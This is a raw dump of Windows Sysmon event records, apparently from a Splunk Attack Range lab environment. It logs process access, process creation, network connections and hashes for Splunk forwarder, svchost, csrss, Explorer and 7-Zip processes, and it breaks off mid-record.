10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-101D-6216-2D04-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.197{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-101D-6216-2D04-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.198{4F8D34B0-101D-6216-2D04-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:46.275{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232BD6624F125B19F34F37C586989656,SHA256=4CB36A5D5DEBA4D5720E0BDB33C443FE3E0BBA81940BFB07560C7EAA59409C2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:43.512{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:46.304{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=411FC94E1682382F04A8BFC3DC3624CC,SHA256=856EEBE9B705B5D13ACDE303CE4555FE36350292B950A098DA4E770BF96302AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:46.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5278660360CD7626E893FF5B05F79AB7,SHA256=EF302B8CFEC03A119F4684BA7A5E3EB533F12849ACD00FD981325739CD66A86E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:46.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=128140C6D1E1BD62088D9F3B683F73E9,SHA256=F6647E5961F16E7E3B47CC7BA6BEC36D2965239D6B90DA04D6F2F79E3F4E8300,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.277{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51268-false10.0.1.12-8089- 10341000x8000000000000000215596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.572{4F8D34B0-101F-6216-2F04-000000003902}31921904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-101F-6216-2F04-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A7F3425236656B13DB1F70B4EB1CA65,SHA256=35CADB39144751A84B93EFC4EEB86C033BDC843325DABD1C139ED24461244AD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-101F-6216-2F04-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.400{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-101F-6216-2F04-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:47.401{4F8D34B0-101F-6216-2F04-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:47.882{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:47.882{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:47.882{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program 